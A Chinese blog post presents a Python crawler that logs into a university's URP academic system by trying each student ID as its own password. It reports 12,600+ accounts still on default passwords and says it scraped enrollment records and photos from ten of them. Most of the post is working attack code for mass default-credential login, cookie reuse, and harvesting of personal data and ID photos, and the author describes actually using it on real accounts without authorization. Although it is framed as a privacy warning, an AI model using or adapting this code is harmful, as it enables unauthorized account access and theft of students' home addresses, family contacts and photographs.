你的个人信息正暴露在互联网中!Python 爬虫获取 URP 教务系统学籍信息


原创文章,转载务必注明原文链接!

初衷

本文旨在提醒同学们及时修改密码,增强保护个人隐私的意识,因此代码中一些关键数据以及校名等信息不会公开!复制粘贴文章中的代码不会爬到任何东西。只是作为学习 Python 爬虫的一点总结而已!

作者所在学校的教务系统安全防范措施可谓非常不严密,学生登录甚至不需要图形验证码。每年学生入学之后,学校下发的账号,初始密码不是无规律的,而是和账号完全一致!如果学生不及时修改密码,那么其他人可以轻松登录他的账号。登录后可以看到学生的学籍信息,包括高考报名时照片,家长联系方式等,联系地址甚至详细到几单元几楼几号门,个人信息泄露情况非常严重!

结果

先说结果。经过两天连写带调试,终于完成了对全校本科生 17400 多个在网账号的测试,其中有 12600 多个账号使用的还是初始密码。此处隐去校名,统计结果如下:

序号 学院 年级 在网账号 可爬账号 年级占比
1 本一 2014 3157 1998 63.29%
2 本一 2015 3328 2234 67.13%
3 本一 2016 3641 3066 84.21%
4 本一 2017 3497 3326 95.11%
5 本三 2014 1759 303 17.23%
6 本三 2015 1643 620 37.74%
7 本三 2016 1605 1434 89.35%
8 本三 2017 1552 639 41.17%

介于初衷,只爬了 10 个账号的信息,以示严重性!

爬到的学籍信息

过程

本人之前做过近 2 年的 Java 相关开发,对 HTTP 协议中常用的知识了解一些,再加上 Python 出了名的简洁易用,因此入门还是比较轻松的。去年有一段时间研究过一阵子 Python,使用的是 Scrapy 框架,所以这一次我也首先想到了 Scrapy。

Scrapy 这种框架适用的情形是:已经获取了需要爬取的页面的一系列 URL ,或者 URL 是成一定规律变化的,不需要登录或者登录一次拿到 Cookie 就可以拿着这个 Cookie 一直用了。但是教务系统完全相反,它需要每次都进行登录,也许 Scrapy 有办法,但也不会太简单,索性自己写。

这套教务系统虽然安全性不怎么样,但也已是一套成熟的产品了,功能和稳定性上还是很不错的。

系统的登录界面

首先使用 Firefox 浏览器的开发者工具查看 HTTP 通信的一些信息:

登录请求 ( POST )

登录表单通过 POST 请求进行提交,参数是账号和密码,发送的也是明文

表单参数

服务器返回的响应中 Set-Cookie 就相当于给用户下发的令牌,用户下一次请求的时候带上这块令牌,服务器就能认出来这个用户是否刚登录过。这个令牌是有时间限制的,每次请求都会刷新一次时间,如果两次请求之间间隔时间超过设定值,那么服务器就不认识用户了,这次会话就结束了,需要重新登录。

登录的响应体

刚开始使用的是 requests ,用 for 循环实现,由于 requests 是同步的,所以效率很低,还会经常卡死。后来改成了协程,用的 gevent + urllib3,效率提升了上百倍。解析 HTML 用的 lxml 的 etree,图片的保存用 PIL 的 Image。

先引入依赖

import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree

创建 HTTP 连接池

http = urllib3.HTTPConnectionPool(
    host=settings.SERVER_HOST,
    port=settings.SERVER_PORT,
    strict=False,
    maxsize=100,
    block=False,
    retries=100,
    timeout=10
)

请求头的一些固定信息可以预先设定好,伪装浏览器

header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Cache-Control': 'max-age=0',
    'Connection': 'Keep-alive',
    'Host': settings.SERVER_HOST,
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}

登录并验证是否是初始密码

# 账号校验器
class InfoValidate(object):
    def __init__(self):
        self.logger = InfoMain.logger
        self.http = InfoMain.http
        # 有效账号
        self.account_valid = []
        # 可爬账号
        self.account_available = []

    def validate(self, all_account):
        # 将所有校验过程加入队列
        jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
        gevent.joinall(jobs, timeout=0)

    def validate_account(self, http, account):
        # 登录请求参数
        param = {"zjh": account, "mm": account}
        header = headers.header
        response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
        self.logger.info('发送请求>>{}'.format(param))
        self.logger.info(response.status)
        # 响应体解码
        res_text = response.data.decode('GB2312', 'ignore')

        if res_text.find('密码不正确') > -1:
            # 密码有误
            self.account_valid.append(account)
        elif not res_text.find('证件号不存在') > -1:
            # 账号可爬
            self.account_available.append(account)
            self.account_valid.append(account)
            self.logger.info("账号可用>>>{}".format(account))

至此已经获取了所有初始密码未修改的账号了,下面研究一下,要爬取的学籍信息页的规律

学籍信息页
table 的结构

一系列的信息都包裹在 <td width = "275"></td>之间,对应的 xpath 表达式即为 //td[starts-with(@width,"275")]/text()

基于之前对账号的测试,爬取学籍信息

# 信息收集器
class InfoCollect(object):
    def __init__(self):
        self.logger = InfoMain.logger
        self.http = InfoMain.http
        # 功能模块
        self.mod_get_roll_info = settings.MOD_ROLL_INFO
        self.mod_get_roll_img = settings.MOD_ROLL_IMG

    def get_info_queue(self, accounts):
        # 将所有信息收集过程加入队列
        jobs = [gevent.spawn(self.get_info, a) for a in accounts]
        gevent.joinall(jobs, timeout=0)

    def get_info(self, stuid):
        # 登录
        param = {'zjh': stuid, 'mm': stuid}
        response = self.http.request('POST', settings.URL_LOGIN, fields=param)
        # 保存 Cookie
        cookie = response.headers['Set-Cookie'].replace('; path=/', '')
        header = headers.header
        header['cookie'] = cookie
        # 学籍信息
        if self.mod_get_roll_info:
            # 带 Cookie 访问学籍信息页
            response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
            text = response_xjxx.data.decode('GB2312', 'ignore')
            # 解析页面内容
            selector = etree.HTML(text)
            text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
            # 学籍信息
            result = []
            for info in text_arr:
                result.append(info.strip())
            self.save_info(result)
        # 学籍照片
        if self.mod_get_roll_img:
            response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
            image = Image.open(BytesIO(response_xjzp.data))
            setpath = settings.PATH_IMG_SAVE
            path = pathlib.Path(setpath)
            if not path.exists():
                path.mkdir()
            setpath = setpath + '/' + stuid + '.jpg'
            image.save(setpath)
            self.logger.info('保存照片>>>{}'.format(setpath))

        # 登出
        self.http.request('POST', settings.URL_LOGOUT, headers=header)

至此,已经实现了所有信息的获取以及照片的保存。

没改密码的同学们应该看到了,获取个人信息其实很简单,关键在于增强自己保护个人信息的意识。

相关开源项目:URP_Spider https://github.com/JamesZBL/URP_Spider

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 151,511评论 1 330
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 64,495评论 1 273
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 101,595评论 0 225
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 42,558评论 0 190
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 50,715评论 3 270
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 39,672评论 1 192
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,112评论 2 291
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,837评论 0 181
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,417评论 0 228
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,928评论 2 232
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,316评论 1 242
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,773评论 2 234
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,253评论 3 220
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,827评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,440评论 0 180
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 34,523评论 2 249
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 34,583评论 2 249

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,048评论 18 139
  • 又有很多人在问我到底什么是日精进? 呵呵,凡是上《三弦智慧》的学员,一秒老师要求每位同学写《日精进》,用笔记下自己...
    吕明超阅读 128评论 0 0
  • JAVA反射机制 JAVA反射机制是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法;对于任...
    NiklausTxt阅读 207评论 4 3